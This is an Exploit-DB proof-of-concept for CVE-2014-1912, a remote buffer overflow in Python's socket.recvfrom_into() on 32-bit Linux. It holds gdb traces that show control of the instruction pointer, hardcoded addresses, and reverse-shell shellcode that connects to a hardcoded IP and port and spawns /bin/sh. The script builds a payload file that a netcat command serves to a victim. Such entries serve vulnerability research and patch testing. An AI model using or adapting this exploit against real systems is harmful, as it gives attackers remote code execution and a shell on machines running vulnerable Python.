Python - 'socket.recvfrom_into()' Remote Buffer Overflow

EDB-ID:

31875

Author:

Sha0

Type:

remote

Platform:

Linux

Published:

2014-02-24

#!/usr/bin/env python

'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912



socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder

TODO: rop to evade stack nx 


(gdb) x/i $eip
=> 0x817bb28:	mov    eax,DWORD PTR [ebx+0x4]       <--- ebx full control => eax full conrol
   0x817bb2b:	test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:	jne    0x817bb38 -->
   ...
   0x817bb38:	mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
   0x817bb3e:	test   eax,eax
   0x817bb40:	jne    0x817bb58 -->
   ...
   0x817bb58:	mov    DWORD PTR [esp],ebx
   0x817bb5b:	call   eax <--------------------- indirect fucktion call ;)


$ ./pyrecvfrominto.py 
	egg file generated

$ cat egg | nc -l 8080 -vv

... when client connects ... or wen we send the evil buffer to the server ...

0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c:	int3    			<--------- LANDED!!!!!
   0x838591d:	xor    eax,eax
   0x838591f:	xor    ebx,ebx
   0x8385921:	xor    ecx,ecx
   0x8385923:	xor    edx,edx

'''

import struct

def off(o):
	return struct.pack('L',o)


reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
reversePort = '\x7a\x69'


#shellcode from exploit-db.com, (remove the sigtrap)
shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
			"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\
			"\x01\x6a\x02\x89\xe1\xcd\x80\x89"\
			"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\
			reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\
			"\xc3\x89\xe1\x6a\x10\x51\x56\x89"\
			"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\
			"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\
			"\xc0\x52\x68\x6e\x2f\x73\x68\x68"\
			"\x2f\x2f\x62\x69\x89\xe3\x52\x53"\
			"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\
			"\x80"


shellcode_sz = len(shellcode)

print 'shellcode sz %d' % shellcode_sz


ebx =  0x08385908
sc_off = 0x08385908+20

padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'

'''           
        +------------+----------------------+         +--------------------+
        |            |                      |         |                    |
        V            |                      |         V                    |
'''
buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)


print 'buff sz: %s' % len(buff)
open('egg','w').write(buff)